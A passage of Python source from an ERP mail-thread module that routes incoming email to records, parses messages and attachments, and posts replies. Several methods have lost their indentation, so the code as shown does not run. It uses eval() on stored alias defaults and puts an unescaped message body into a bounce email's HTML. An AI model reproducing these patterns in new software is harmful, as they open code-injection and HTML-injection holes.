""" Used by the plugin addon, based for plugin_outlook and others. """
ret_dict = {}
for model_name in self.pool.obj_list():
model = self.pool[model_name]
if hasattr(model, "message_process") and hasattr(model, "message_post"):
ret_dict[model_name] = model._description
return ret_dict
    def _message_find_partners(self, cr, uid, message, header_fields=['From'], context=None):
        """ Find partners related to some header fields of the message.

            :param message: an email.message instance
            :param list header_fields: email headers whose addresses are
                looked up (the default list is only iterated, never mutated)
            :return: partner ids found for the extracted email addresses,
                with falsy entries filtered out
        """
        s = ', '.join([decode(message.get(h)) for h in header_fields if message.get(h)])
        return filter(lambda x: x, self._find_partner_from_emails(cr, uid, None, tools.email_split(s), context=context))
    def message_route_verify(self, cr, uid, message, message_dict, route, update_author=True, assert_model=True, create_fallback=True, context=None):
        """ Verify route validity. Check and rules:
            1 - if thread_id -> check that document effectively exists; otherwise
                fallback on a message_new by resetting thread_id
            2 - check that message_update exists if thread_id is set; or at least
                that message_new exist
            [ - find author_id if update_author is set]
            3 - if there is an alias, check alias_contact:
                'followers' and thread_id:
                    check on target document that the author is in the followers
                'followers' and alias_parent_thread_id:
                    check on alias parent document that the author is in the
                    followers
                'partners': check that author_id id set

            :return: the (possibly fixed) 5-tuple route, or an empty tuple
                when the message must be skipped
        """
        assert isinstance(route, (list, tuple)), 'A route should be a list or a tuple'
        assert len(route) == 5, 'A route should contain 5 elements: model, thread_id, custom_values, uid, alias record'

        message_id = message.get('Message-Id')
        email_from = decode_header(message, 'From')
        author_id = message_dict.get('author_id')
        model, thread_id, alias = route[0], route[1], route[4]
        model_pool = None

        def _create_bounce_email():
            # best-effort auto-reply telling the sender the address is restricted
            mail_mail = self.pool.get('mail.mail')
            mail_id = mail_mail.create(cr, uid, {
                'body_html': '<div><p>Hello,</p>'
                    '<p>The following email sent to %s cannot be accepted because this is '
                    'a private email address. Only allowed people can contact us at this address.</p></div>'
                    '<blockquote>%s</blockquote>' % (message.get('to'), message_dict.get('body')),
                'subject': 'Re: %s' % message.get('subject'),
                'email_to': message.get('from'),
                'auto_delete': True,
            }, context=context)
            mail_mail.send(cr, uid, [mail_id], context=context)

        def _warn(message):
            _logger.warning('Routing mail with Message-Id %s: route %s: %s',
                            message_id, route, message)

        # Wrong model
        if model and not model in self.pool:
            if assert_model:
                assert model in self.pool, 'Routing: unknown target model %s' % model
            _warn('unknown target model %s' % model)
            return ()
        elif model:
            model_pool = self.pool[model]

        # Private message: should not contain any thread_id
        if not model and thread_id:
            if assert_model:
                assert thread_id == 0, 'Routing: posting a message without model should be with a null res_id (private message), received %s.' % thread_id
            _warn('posting a message without model should be with a null res_id (private message), received %s, resetting thread_id' % thread_id)
            thread_id = 0
        # Private message: should have a parent_id (only answers)
        if not model and not message_dict.get('parent_id'):
            if assert_model:
                assert message_dict.get('parent_id'), 'Routing: posting a message without model should be with a parent_id (private mesage).'
            _warn('posting a message without model should be with a parent_id (private mesage), skipping')
            return ()

        # Existing Document: check if exists; if not, fallback on create if allowed
        if thread_id and not model_pool.exists(cr, uid, thread_id):
            if create_fallback:
                _warn('reply to missing document (%s,%s), fall back on new document creation' % (model, thread_id))
                thread_id = None
            elif assert_model:
                assert model_pool.exists(cr, uid, thread_id), 'Routing: reply to missing document (%s,%s)' % (model, thread_id)
            else:
                _warn('reply to missing document (%s,%s), skipping' % (model, thread_id))
                return ()

        # Existing Document: check model accepts the mailgateway
        if thread_id and model and not hasattr(model_pool, 'message_update'):
            if create_fallback:
                _warn('model %s does not accept document update, fall back on document creation' % model)
                thread_id = None
            elif assert_model:
                assert hasattr(model_pool, 'message_update'), 'Routing: model %s does not accept document update, crashing' % model
            else:
                _warn('model %s does not accept document update, skipping' % model)
                return ()

        # New Document: check model accepts the mailgateway
        if not thread_id and model and not hasattr(model_pool, 'message_new'):
            if assert_model:
                assert hasattr(model_pool, 'message_new'), 'Model %s does not accept document creation, crashing' % model
            _warn('model %s does not accept document creation, skipping' % model)
            return ()

        # Update message author if asked
        # We do it now because we need it for aliases (contact settings)
        if not author_id and update_author:
            author_ids = self._find_partner_from_emails(cr, uid, thread_id, [email_from], model=model, context=context)
            if author_ids:
                author_id = author_ids[0]
                message_dict['author_id'] = author_id

        # Alias: check alias_contact settings
        if alias and alias.alias_contact == 'followers' and (thread_id or alias.alias_parent_thread_id):
            # check followership either on the target document or on the
            # alias parent document
            if thread_id:
                obj = self.pool[model].browse(cr, uid, thread_id, context=context)
            else:
                obj = self.pool[alias.alias_parent_model_id.model].browse(cr, uid, alias.alias_parent_thread_id, context=context)
            if not author_id or not author_id in [fol.id for fol in obj.message_follower_ids]:
                _warn('alias %s restricted to internal followers, skipping' % alias.alias_name)
                _create_bounce_email()
                return ()
        elif alias and alias.alias_contact == 'partners' and not author_id:
            _warn('alias %s does not accept unknown author, skipping' % alias.alias_name)
            _create_bounce_email()
            return ()

        return (model, thread_id, route[2], route[3], route[4])
    def message_route(self, cr, uid, message, message_dict, model=None, thread_id=None,
                      custom_values=None, context=None):
        """Attempt to figure out the correct target model, thread_id,
        custom_values and user_id to use for an incoming message.
        Multiple values may be returned, if a message had multiple
        recipients matching existing mail.aliases, for example.

        The following heuristics are used, in this order:
        1. If the message replies to an existing thread_id, and
           properly contains the thread model in the 'In-Reply-To'
           header, use this model/thread_id pair, and ignore
           custom_value (not needed as no creation will take place)
        2. Look for a mail.alias entry matching the message
           recipient, and use the corresponding model, thread_id,
           custom_values and user_id.
        3. Fallback to the ``model``, ``thread_id`` and ``custom_values``
           provided.
        4. If all the above fails, raise an exception.

        :param string message: an email.message instance
        :param dict message_dict: dictionary holding message variables
        :param string model: the fallback model to use if the message
            does not match any of the currently configured mail aliases
            (may be None if a matching alias is supposed to be present)
        :type dict custom_values: optional dictionary of default field values
            to pass to ``message_new`` if a new record needs to be created.
            Ignored if the thread record already exists, and also if a
            matching mail.alias was found (aliases define their own defaults)
        :param int thread_id: optional ID of the record/thread from ``model``
            to which this mail should be attached. Only used if the message
            does not reply to an existing thread and does not match any mail alias.
        :return: list of [model, thread_id, custom_values, user_id, alias]
        """
        assert isinstance(message, Message), 'message must be an email.message.Message at this point'
        mail_msg_obj = self.pool['mail.message']
        fallback_model = model

        # Get email.message.Message variables for future processing
        message_id = message.get('Message-Id')
        email_from = decode_header(message, 'From')
        email_to = decode_header(message, 'To')
        references = decode_header(message, 'References')
        in_reply_to = decode_header(message, 'In-Reply-To')
        thread_references = references or in_reply_to

        # 1. message is a reply to an existing message (exact match of message_id)
        msg_references = thread_references.split()
        mail_message_ids = mail_msg_obj.search(cr, uid, [('message_id', 'in', msg_references)], context=context)
        if mail_message_ids:
            original_msg = mail_msg_obj.browse(cr, SUPERUSER_ID, mail_message_ids[0], context=context)
            model, thread_id = original_msg.model, original_msg.res_id
            _logger.info(
                'Routing mail from %s to %s with Message-Id %s: direct reply to msg: model: %s, thread_id: %s, custom_values: %s, uid: %s',
                email_from, email_to, message_id, model, thread_id, custom_values, uid)
            route = self.message_route_verify(
                cr, uid, message, message_dict,
                (model, thread_id, custom_values, uid, None),
                update_author=True, assert_model=True, create_fallback=True, context=context)
            return route and [route] or []

        # 2. message is a reply to an existing thread (6.1 compatibility:
        #    match "<model>-<id>" references generated by older versions)
        ref_match = thread_references and tools.reference_re.search(thread_references)
        if ref_match:
            thread_id = int(ref_match.group(1))
            model = ref_match.group(2) or fallback_model
            if thread_id and model in self.pool:
                model_obj = self.pool[model]
                compat_mail_msg_ids = mail_msg_obj.search(
                    cr, uid, [
                        ('message_id', '=', False),
                        ('model', '=', model),
                        ('res_id', '=', thread_id),
                    ], context=context)
                if compat_mail_msg_ids and model_obj.exists(cr, uid, thread_id) and hasattr(model_obj, 'message_update'):
                    _logger.info(
                        'Routing mail from %s to %s with Message-Id %s: direct thread reply (compat-mode) to model: %s, thread_id: %s, custom_values: %s, uid: %s',
                        email_from, email_to, message_id, model, thread_id, custom_values, uid)
                    route = self.message_route_verify(
                        cr, uid, message, message_dict,
                        (model, thread_id, custom_values, uid, None),
                        update_author=True, assert_model=True, create_fallback=True, context=context)
                    return route and [route] or []

        # 3. Reply to a private message
        if in_reply_to:
            mail_message_ids = mail_msg_obj.search(cr, uid, [
                ('message_id', '=', in_reply_to),
                '!', ('message_id', 'ilike', 'reply_to')
            ], limit=1, context=context)
            if mail_message_ids:
                mail_message = mail_msg_obj.browse(cr, uid, mail_message_ids[0], context=context)
                _logger.info('Routing mail from %s to %s with Message-Id %s: direct reply to a private message: %s, custom_values: %s, uid: %s',
                             email_from, email_to, message_id, mail_message.id, custom_values, uid)
                route = self.message_route_verify(cr, uid, message, message_dict,
                                                  (mail_message.model, mail_message.res_id, custom_values, uid, None),
                                                  update_author=True, assert_model=True, create_fallback=True, context=context)
                return route and [route] or []

        # 4. Look for a matching mail.alias entry
        # Delivered-To is a safe bet in most modern MTAs, but we have to fallback on To + Cc values
        # for all the odd MTAs out there, as there is no standard header for the envelope's `rcpt_to` value.
        rcpt_tos = \
            ','.join([decode_header(message, 'Delivered-To'),
                      decode_header(message, 'To'),
                      decode_header(message, 'Cc'),
                      decode_header(message, 'Resent-To'),
                      decode_header(message, 'Resent-Cc')])
        local_parts = [e.split('@')[0] for e in tools.email_split(rcpt_tos)]
        if local_parts:
            mail_alias = self.pool.get('mail.alias')
            alias_ids = mail_alias.search(cr, uid, [('alias_name', 'in', local_parts)])
            if alias_ids:
                routes = []
                for alias in mail_alias.browse(cr, uid, alias_ids, context=context):
                    user_id = alias.alias_user_id.id
                    if not user_id:
                        # TDE note: this could cause crashes, because no clue that the user
                        # that send the email has the right to create or modify a new document
                        # Fallback on user_id = uid
                        # Note: recognized partners will be added as followers anyway
                        # user_id = self._message_find_user_id(cr, uid, message, context=context)
                        user_id = uid
                        _logger.info('No matching user_id for the alias %s', alias.alias_name)
                    # NOTE(review): eval() on alias_defaults assumes the stored
                    # defaults are trusted (admin-configured); never let this
                    # value come from user-controlled input
                    route = (alias.alias_model_id.model, alias.alias_force_thread_id, eval(alias.alias_defaults), user_id, alias)
                    _logger.info('Routing mail from %s to %s with Message-Id %s: direct alias match: %r',
                                 email_from, email_to, message_id, route)
                    route = self.message_route_verify(cr, uid, message, message_dict, route,
                                                      update_author=True, assert_model=True, create_fallback=True, context=context)
                    if route:
                        routes.append(route)
                return routes

        # 5. Fallback to the provided parameters, if they work
        if not thread_id:
            # Legacy: fallback to matching [ID] in the Subject
            match = tools.res_re.search(decode_header(message, 'Subject'))
            thread_id = match and match.group(1)
            # Convert into int (bug spotted in 7.0 because of str)
            try:
                thread_id = int(thread_id)
            except:
                thread_id = False
        _logger.info('Routing mail from %s to %s with Message-Id %s: fallback to model:%s, thread_id:%s, custom_values:%s, uid:%s',
                     email_from, email_to, message_id, fallback_model, thread_id, custom_values, uid)
        route = self.message_route_verify(cr, uid, message, message_dict,
                                          (fallback_model, thread_id, custom_values, uid, None),
                                          update_author=True, assert_model=True, context=context)
        if route:
            return [route]

        # AssertionError if no routes found and if no bounce occured
        assert False, \
            "No possible route found for incoming message from %s to %s (Message-Id %s:)." \
            "Create an appropriate mail.alias or force the destination model." % (email_from, email_to, message_id)
def message_route_process(self, cr, uid, message, message_dict, routes, context=None):
# postpone setting message_dict.partner_ids after message_post, to avoid double notifications
partner_ids = message_dict.pop('partner_ids', [])
thread_id = False
for model, thread_id, custom_values, user_id, alias in routes:
if self._name == 'mail.thread':
context.update({'thread_model': model})
if model:
model_pool = self.pool[model]
assert thread_id and hasattr(model_pool, 'message_update') or hasattr(model_pool, 'message_new'), \
"Undeliverable mail with Message-Id %s, model %s does not accept incoming emails" % \
(message_dict['message_id'], model)
# disabled subscriptions during message_new/update to avoid having the system user running the
# email gateway become a follower of all inbound messages
nosub_ctx = dict(context, mail_create_nosubscribe=True, mail_create_nolog=True)
if thread_id and hasattr(model_pool, 'message_update'):
model_pool.message_update(cr, user_id, [thread_id], message_dict, context=nosub_ctx)
else:
thread_id = model_pool.message_new(cr, user_id, message_dict, custom_values, context=nosub_ctx)
else:
assert thread_id == 0, "Posting a message without model should be with a null res_id, to create a private message."
model_pool = self.pool.get('mail.thread')
if not hasattr(model_pool, 'message_post'):
context['thread_model'] = model
model_pool = self.pool['mail.thread']
new_msg_id = model_pool.message_post(cr, uid, [thread_id], context=context, subtype='mail.mt_comment', **message_dict)
if partner_ids:
# postponed after message_post, because this is an external message and we don't want to create
# duplicate emails due to notifications
self.pool.get('mail.message').write(cr, uid, [new_msg_id], {'partner_ids': partner_ids}, context=context)
return thread_id
    def message_process(self, cr, uid, model, message, custom_values=None,
                        save_original=False, strip_attachments=False,
                        thread_id=None, context=None):
        """ Process an incoming RFC2822 email message, relying on
            ``mail.message.parse()`` for the parsing operation,
            and ``message_route()`` to figure out the target model.

            Once the target model is known, its ``message_new`` method
            is called with the new message (if the thread record did not exist)
            or its ``message_update`` method (if it did).

            There is a special case where the target model is False: a reply
            to a private message. In this case, we skip the message_new /
            message_update step, to just post a new message using mail_thread
            message_post.

            :param string model: the fallback model to use if the message
                does not match any of the currently configured mail aliases
                (may be None if a matching alias is supposed to be present)
            :param message: source of the RFC2822 message
            :type message: string or xmlrpclib.Binary
            :type dict custom_values: optional dictionary of field values
                to pass to ``message_new`` if a new record needs to be created.
                Ignored if the thread record already exists, and also if a
                matching mail.alias was found (aliases define their own defaults)
            :param bool save_original: whether to keep a copy of the original
                email source attached to the message after it is imported.
            :param bool strip_attachments: whether to strip all attachments
                before processing the message, in order to save some space.
            :param int thread_id: optional ID of the record/thread from ``model``
                to which this mail should be attached. When provided, this
                overrides the automatic detection based on the message
                headers.
            :return: id of the thread the message was posted on, or False when
                the message was ignored (duplicate Message-Id)
        """
        if context is None:
            context = {}

        # extract message bytes - we are forced to pass the message as binary because
        # we don't know its encoding until we parse its headers and hence can't
        # convert it to utf-8 for transport between the mailgate script and here.
        if isinstance(message, xmlrpclib.Binary):
            message = str(message.data)
        # Warning: message_from_string doesn't always work correctly on unicode,
        # we must use utf-8 strings here :-(
        if isinstance(message, unicode):
            message = message.encode('utf-8')
        msg_txt = email.message_from_string(message)

        # parse the message, verify we are not in a loop by checking message_id is not duplicated
        msg = self.message_parse(cr, uid, msg_txt, save_original=save_original, context=context)
        if strip_attachments:
            msg.pop('attachments', None)

        # loop/duplicate protection: a Message-Id already present in mail.message
        # means this email was already processed by the gateway
        if msg.get('message_id'):   # should always be True as message_parse generate one if missing
            existing_msg_ids = self.pool.get('mail.message').search(cr, SUPERUSER_ID, [
                ('message_id', '=', msg.get('message_id')),
            ], context=context)
            if existing_msg_ids:
                _logger.info('Ignored mail from %s to %s with Message-Id %s: found duplicated Message-Id during processing',
                             msg.get('from'), msg.get('to'), msg.get('message_id'))
                return False

        # find possible routes for the message, then deliver it to each route
        routes = self.message_route(cr, uid, msg_txt, msg, model, thread_id, custom_values, context=context)
        thread_id = self.message_route_process(cr, uid, msg_txt, msg, routes, context=context)
        return thread_id
def message_new(self, cr, uid, msg_dict, custom_values=None, context=None):
"""Called by ``message_process`` when a new message is received
for a given thread model, if the message did not belong to
an existing thread.
The default behavior is to create a new record of the corresponding
model (based on some very basic info extracted from the message).
Additional behavior may be implemented by overriding this method.
:param dict msg_dict: a map containing the email details and
attachments. See ``message_process`` and
``mail.message.parse`` for details.
:param dict custom_values: optional dictionary of additional
field values to pass to create()
when creating the new thread record.
Be careful, these values may override
any other values coming from the message.
:param dict context: if a ``thread_model`` value is present
in the context, its value will be used
to determine the model of the record
to create (instead of the current model).
:rtype: int
:return: the id of the newly created thread object
"""
if context is None:
context = {}
data = {}
if isinstance(custom_values, dict):
data = custom_values.copy()
model = context.get('thread_model') or self._name
model_pool = self.pool[model]
fields = model_pool.fields_get(cr, uid, context=context)
if 'name' in fields and not data.get('name'):
data['name'] = msg_dict.get('subject', '')
res_id = model_pool.create(cr, uid, data, context=context)
return res_id
def message_update(self, cr, uid, ids, msg_dict, update_vals=None, context=None):
"""Called by ``message_process`` when a new message is received
for an existing thread. The default behavior is to update the record
with update_vals taken from the incoming email.
Additional behavior may be implemented by overriding this
method.
:param dict msg_dict: a map containing the email details and
attachments. See ``message_process`` and
``mail.message.parse()`` for details.
:param dict update_vals: a dict containing values to update records
given their ids; if the dict is None or is
void, no write operation is performed.
"""
if update_vals:
self.write(cr, uid, ids, update_vals, context=context)
return True
    def _message_extract_payload(self, message, save_original=False):
        """Extract body as HTML and attachments from the mail message.

            :param message: email.message.Message to process
            :param bool save_original: if set, the raw message source is kept
                as an extra 'original_email.eml' attachment
            :return: tuple ``(body, attachments)``: body is a unicode HTML
                string, attachments a list of ``(filename, payload)`` tuples
        """
        attachments = []
        body = u''
        if save_original:
            attachments.append(('original_email.eml', message.as_string()))
        if not message.is_multipart() or 'text/' in message.get('content-type', ''):
            # single-part message: the whole payload is the body
            encoding = message.get_content_charset()
            body = message.get_payload(decode=True)
            body = tools.ustr(body, encoding, errors='replace')
            if message.get_content_type() == 'text/plain':
                # text/plain -> <pre/>
                body = tools.append_content_to_html(u'', body, preserve=True)
        else:
            # multipart: walk every part, collecting body parts and attachments
            alternative = False
            for part in message.walk():
                if part.get_content_type() == 'multipart/alternative':
                    alternative = True
                if part.get_content_maintype() == 'multipart':
                    continue  # skip container
                # part.get_filename returns decoded value if able to decode, coded otherwise.
                # original get_filename is not able to decode iso-8859-1 (for instance).
                # therefore, iso encoded attachements are not able to be decoded properly with get_filename
                # code here partially copy the original get_filename method, but handle more encoding
                filename=part.get_param('filename', None, 'content-disposition')
                if not filename:
                    filename=part.get_param('name', None)
                if filename:
                    if isinstance(filename, tuple):
                        # RFC2231
                        filename=email.utils.collapse_rfc2231_value(filename).strip()
                    else:
                        filename=decode(filename)
                encoding = part.get_content_charset()  # None if attachment
                # 1) Explicit Attachments -> attachments
                if filename or part.get('content-disposition', '').strip().startswith('attachment'):
                    attachments.append((filename or 'attachment', part.get_payload(decode=True)))
                    continue
                # 2) text/plain -> <pre/>
                if part.get_content_type() == 'text/plain' and (not alternative or not body):
                    body = tools.append_content_to_html(body, tools.ustr(part.get_payload(decode=True),
                                                                         encoding, errors='replace'), preserve=True)
                # 3) text/html -> raw
                elif part.get_content_type() == 'text/html':
                    html = tools.ustr(part.get_payload(decode=True), encoding, errors='replace')
                    if alternative:
                        # in a multipart/alternative, the html version supersedes the text one
                        body = html
                    else:
                        body = tools.append_content_to_html(body, html, plaintext=False)
                # 4) Anything else -> attachment
                else:
                    attachments.append((filename or 'attachment', part.get_payload(decode=True)))
        return body, attachments
    def message_parse(self, cr, uid, message, save_original=False, context=None):
        """Parses a string or email.message.Message representing an
           RFC-2822 email, and returns a generic dict holding the
           message details.

           :param message: the message to parse
           :type message: email.message.Message | string | unicode
           :param bool save_original: whether the returned dict
               should include an ``original`` attachment containing
               the source of the message
           :rtype: dict
           :return: A dict with the following structure, where each
                    field may not be present if missing in original
                    message::

                    { 'message_id': msg_id,
                      'subject': subject,
                      'from': from,
                      'to': to,
                      'cc': cc,
                      'body': unified_body,
                      'attachments': [('file1', 'bytes'),
                                      ('file2', 'bytes')}
                    }
        """
        msg_dict = {
            'type': 'email',
        }
        if not isinstance(message, Message):
            if isinstance(message, unicode):
                # Warning: message_from_string doesn't always work correctly on unicode,
                # we must use utf-8 strings here :-(
                message = message.encode('utf-8')
            message = email.message_from_string(message)

        # a Message-Id is required downstream (duplicate detection, threading);
        # generate one when the incoming mail has none
        message_id = message['message-id']
        if not message_id:
            # Very unusual situation, be we should be fault-tolerant here
            message_id = "<%s@localhost>" % time.time()
            _logger.debug('Parsing Message without message-id, generating a random one: %s', message_id)
        msg_dict['message_id'] = message_id

        if message.get('Subject'):
            msg_dict['subject'] = decode(message.get('Subject'))

        # Envelope fields not stored in mail.message but made available for message_new()
        msg_dict['from'] = decode(message.get('from'))
        msg_dict['to'] = decode(message.get('to'))
        msg_dict['cc'] = decode(message.get('cc'))

        msg_dict['email_from'] = decode(message.get('from'))
        # resolve To/Cc addresses into partner follower commands
        partner_ids = self._message_find_partners(cr, uid, message, ['To', 'Cc'], context=context)
        msg_dict['partner_ids'] = [(4, partner_id) for partner_id in partner_ids]

        if message.get('Date'):
            try:
                date_hdr = decode(message.get('Date'))
                parsed_date = dateutil.parser.parse(date_hdr, fuzzy=True)
                if parsed_date.utcoffset() is None:
                    # naive datetime, so we arbitrarily decide to make it
                    # UTC, there's no better choice. Should not happen,
                    # as RFC2822 requires timezone offset in Date headers.
                    stored_date = parsed_date.replace(tzinfo=pytz.utc)
                else:
                    stored_date = parsed_date.astimezone(tz=pytz.utc)
            except Exception:
                _logger.warning('Failed to parse Date header %r in incoming mail '
                                'with message-id %r, assuming current date/time.',
                                message.get('Date'), message_id)
                stored_date = datetime.datetime.now()
            msg_dict['date'] = stored_date.strftime(tools.DEFAULT_SERVER_DATETIME_FORMAT)

        # threading: prefer In-Reply-To, fall back on any known id in References
        if message.get('In-Reply-To'):
            parent_ids = self.pool.get('mail.message').search(cr, uid, [('message_id', '=', decode(message['In-Reply-To']))])
            if parent_ids:
                msg_dict['parent_id'] = parent_ids[0]

        if message.get('References') and 'parent_id' not in msg_dict:
            parent_ids = self.pool.get('mail.message').search(cr, uid, [('message_id', 'in',
                                                                         [x.strip() for x in decode(message['References']).split()])])
            if parent_ids:
                msg_dict['parent_id'] = parent_ids[0]

        msg_dict['body'], msg_dict['attachments'] = self._message_extract_payload(message, save_original=save_original)
        return msg_dict
#------------------------------------------------------
# Note specific
#------------------------------------------------------
def log(self, cr, uid, id, message, secondary=False, context=None):
_logger.warning("log() is deprecated. As this module inherit from "\
"mail.thread, the message will be managed by this "\
"module instead of by the res.log mechanism. Please "\
"use mail_thread.message_post() instead of the "\
"now deprecated res.log.")
self.message_post(cr, uid, [id], message, context=context)
def _message_add_suggested_recipient(self, cr, uid, result, obj, partner=None, email=None, reason='', context=None):
""" Called by message_get_suggested_recipients, to add a suggested
recipient in the result dictionary. The form is :
partner_id, partner_name<partner_email> or partner_name, reason """
if email and not partner:
# get partner info from email
partner_info = self.message_partner_info_from_emails(cr, uid, obj.id, [email], context=context)[0]
if partner_info.get('partner_id'):
partner = self.pool.get('res.partner').browse(cr, SUPERUSER_ID, [partner_info['partner_id']], context=context)[0]
if email and email in [val[1] for val in result[obj.id]]: # already existing email -> skip
return result
if partner and partner in obj.message_follower_ids: # recipient already in the followers -> skip
return result
if partner and partner in [val[0] for val in result[obj.id]]: # already existing partner ID -> skip
return result
if partner and partner.email: # complete profile: id, name <email>
result[obj.id].append((partner.id, '%s<%s>' % (partner.name, partner.email), reason))
elif partner: # incomplete profile: id, name
result[obj.id].append((partner.id, '%s' % (partner.name), reason))
else: # unknown partner, we are probably managing an email address
result[obj.id].append((False, email, reason))
return result
def message_get_suggested_recipients(self, cr, uid, ids, context=None):
""" Returns suggested recipients for ids. Those are a list of
tuple (partner_id, partner_name, reason), to be managed by Chatter. """
result = dict.fromkeys(ids, list())
if self._all_columns.get('user_id'):
for obj in self.browse(cr, SUPERUSER_ID, ids, context=context): # SUPERUSER because of a read on res.users that would crash otherwise
if not obj.user_id or not obj.user_id.partner_id:
continue
self._message_add_suggested_recipient(cr, uid, result, obj, partner=obj.user_id.partner_id, reason=self._all_columns['user_id'].column.string, context=context)
return result
def _find_partner_from_emails(self, cr, uid, id, emails, model=None, context=None, check_followers=True):
""" Utility method to find partners from email addresses. The rules are :
1 - check in document (model | self, id) followers
2 - try to find a matching partner that is also an user
3 - try to find a matching partner
:param list emails: list of email addresses
:param string model: model to fetch related record; by default self
is used.
:param boolean check_followers: check in document followers
"""
partner_obj = self.pool['res.partner']
partner_ids = []
obj = None
if id and (model or self._name != 'mail.thread') and check_followers:
if model:
obj = self.pool[model].browse(cr, uid, id, context=context)
else:
obj = self.browse(cr, uid, id, context=context)
for contact in emails:
partner_id = False
email_address = tools.email_split(contact)
if not email_address:
partner_ids.append(partner_id)
continue
email_address = email_address[0]
# first try: check in document's followers
if obj:
for follower in obj.message_follower_ids:
if follower.email == email_address:
partner_id = follower.id
# second try: check in partners that are also users
if not partner_id:
ids = partner_obj.search(cr, SUPERUSER_ID, [
('email', 'ilike', email_address),
('user_ids', '!=', False)
], limit=1, context=context)
if ids:
partner_id = ids[0]
# third try: check in partners
if not partner_id:
ids = partner_obj.search(cr, SUPERUSER_ID, [
('email', 'ilike', email_address)
], limit=1, context=context)
if ids:
partner_id = ids[0]
partner_ids.append(partner_id)
return partner_ids
def message_partner_info_from_emails(self, cr, uid, id, emails, link_mail=False, context=None):
""" Convert a list of emails into a list partner_ids and a list
new_partner_ids. The return value is non conventional because
it is meant to be used by the mail widget.
:return dict: partner_ids and new_partner_ids """
mail_message_obj = self.pool.get('mail.message')
partner_ids = self._find_partner_from_emails(cr, uid, id, emails, context=context)
result = list()
for idx in range(len(emails)):
email_address = emails[idx]
partner_id = partner_ids[idx]
partner_info = {'full_name': email_address, 'partner_id': partner_id}
result.append(partner_info)
# link mail with this from mail to the new partner id
if link_mail and partner_info['partner_id']:
message_ids = mail_message_obj.search(cr, SUPERUSER_ID, [
'|',
('email_from', '=', email_address),
('email_from', 'ilike', '<%s>' % email_address),
('author_id', '=', False)
], context=context)
if message_ids:
mail_message_obj.write(cr, SUPERUSER_ID, message_ids, {'author_id': partner_info['partner_id']}, context=context)
return result
def _message_preprocess_attachments(self, cr, uid, attachments, attachment_ids, attach_model, attach_res_id, context=None):
""" Preprocess attachments for mail_thread.message_post() or mail_mail.create().
:param list attachments: list of attachment tuples in the form ``(name,content)``,
where content is NOT base64 encoded
:param list attachment_ids: a list of attachment ids, not in tomany command form
:param str attach_model: the model of the attachments parent record
:param integer attach_res_id: the id of the attachments parent record
"""
Attachment = self.pool['ir.attachment']
m2m_attachment_ids = []
if attachment_ids:
filtered_attachment_ids = Attachment.search(cr, SUPERUSER_ID, [
('res_model', '=', 'mail.compose.message'),
('create_uid', '=', uid),
('id', 'in', attachment_ids)], context=context)
if filtered_attachment_ids:
Attachment.write(cr, SUPERUSER_ID, filtered_attachment_ids, {'res_model': attach_model, 'res_id': attach_res_id}, context=context)
m2m_attachment_ids += [(4, id) for id in attachment_ids]
# Handle attachments parameter, that is a dictionary of attachments
for name, content in attachments:
if isinstance(content, unicode):
content = content.encode('utf-8')
data_attach = {
'name': name,
'datas': base64.b64encode(str(content)),
'datas_fname': name,
'description': name,
'res_model': attach_model,
'res_id': attach_res_id,
}
m2m_attachment_ids.append((0, 0, data_attach))
return m2m_attachment_ids
    def message_post(self, cr, uid, thread_id, body='', subject=None, type='notification',
                     subtype=None, parent_id=False, attachments=None, context=None,
                     content_subtype='html', **kwargs):
        """ Post a new message in an existing thread, returning the new
            mail.message ID.

            :param int thread_id: thread ID to post into, or list with one ID;
                if False/0, mail.message model will also be set as False
            :param str body: body of the message, usually raw HTML that will
                be sanitized
            :param str type: see mail_message.type field
            :param str content_subtype: if 'plaintext', convert body into html
            :param int parent_id: handle reply to a previous message by adding the
                parent partners to the message in case of private discussion
            :param tuple(str,str) attachments or list id: list of attachment tuples in the form
                ``(name,content)``, where content is NOT base64 encoded

            Extra keyword arguments will be used as default column values for the
            new mail.message record. Special cases:
                - attachment_ids: supposed not attached to any document; attach them
                    to the related document. Should only be set by Chatter.
            :return int: ID of newly created mail.message
        """
        if context is None:
            context = {}
        if attachments is None:
            attachments = {}
        mail_message = self.pool.get('mail.message')
        ir_attachment = self.pool.get('ir.attachment')

        assert (not thread_id) or \
                isinstance(thread_id, (int, long)) or \
                (isinstance(thread_id, (list, tuple)) and len(thread_id) == 1), \
                "Invalid thread_id; should be 0, False, an ID or a list with one ID"
        if isinstance(thread_id, (list, tuple)):
            thread_id = thread_id[0]

        # if we're processing a message directly coming from the gateway, the destination model was
        # set in the context.
        model = False
        if thread_id:
            model = context.get('thread_model', self._name) if self._name == 'mail.thread' else self._name
            if model != self._name and hasattr(self.pool[model], 'message_post'):
                # delegate posting to the real document model
                # NOTE(review): this removes 'thread_model' from the caller's
                # context dict in place — confirm callers do not reuse it
                del context['thread_model']
                return self.pool[model].message_post(cr, uid, thread_id, body=body, subject=subject, type=type, subtype=subtype, parent_id=parent_id, attachments=attachments, context=context, content_subtype=content_subtype, **kwargs)

        #0: Find the message's author, because we need it for private discussion
        author_id = kwargs.get('author_id')
        if author_id is None:  # keep False values
            author_id = self.pool.get('mail.message')._get_default_author(cr, uid, context=context)

        # 1: Handle content subtype: if plaintext, converto into HTML
        if content_subtype == 'plaintext':
            body = tools.plaintext2html(body)

        # 2: Private message: add recipients (recipients and author of parent message) - current author
        #   + legacy-code management (! we manage only 4 and 6 commands)
        partner_ids = set()
        kwargs_partner_ids = kwargs.pop('partner_ids', [])
        for partner_id in kwargs_partner_ids:
            if isinstance(partner_id, (list, tuple)) and partner_id[0] == 4 and len(partner_id) == 2:
                partner_ids.add(partner_id[1])
            if isinstance(partner_id, (list, tuple)) and partner_id[0] == 6 and len(partner_id) == 3:
                partner_ids |= set(partner_id[2])
            elif isinstance(partner_id, (int, long)):
                partner_ids.add(partner_id)
            else:
                pass  # we do not manage anything else
        if parent_id and not model:
            # private discussion: recipients of the parent + its author, minus
            # the current author
            parent_message = mail_message.browse(cr, uid, parent_id, context=context)
            private_followers = set([partner.id for partner in parent_message.partner_ids])
            if parent_message.author_id:
                private_followers.add(parent_message.author_id.id)
            private_followers -= set([author_id])
            partner_ids |= private_followers

        # 3. Attachments
        #   - HACK TDE FIXME: Chatter: attachments linked to the document (not done JS-side), load the message
        attachment_ids = self._message_preprocess_attachments(cr, uid, attachments, kwargs.pop('attachment_ids', []), model, thread_id, context)

        # 4: mail.message.subtype
        subtype_id = False
        if subtype:
            if '.' not in subtype:
                # bare subtype names default to the 'mail' module namespace
                subtype = 'mail.%s' % subtype
            ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, *subtype.split('.'))
